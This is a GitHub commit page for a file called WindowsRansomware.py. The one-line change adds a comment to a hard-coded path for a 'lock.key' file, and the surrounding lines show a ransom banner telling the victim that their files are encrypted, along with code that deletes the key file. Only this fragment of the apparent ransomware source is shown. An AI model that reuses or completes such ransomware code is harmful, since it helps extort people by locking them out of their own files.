Skip to content

Commit

Permalink
WindowsRansomware.py
Browse files Browse the repository at this point in the history
  • Loading branch information
privateboss0 authored Aug 3, 2024
1 parent aec79f2 commit bdbec15
Showing 1 changed file with 1 addition and 1 deletion.
Original file line number Diff line number Diff line change
Expand Up @@ -41,7 +41,7 @@
ATTENTION!!!.. All your files has been encrypted by our Ransomware. You are victim 0101. Read the payment_instructions file for more details....ATTENTION!!!
''')
filepath = "\Ishola Francis Ayinde\Python files\Test_Files\lock.key"
filepath = "\Ishola Francis Ayinde\Python files\Test_Files\lock.key" ##Replace with actual directory where the ransomware program is being run.

try:
os.remove(filepath)
Expand Down

0 comments on commit bdbec15

Please sign in to comment.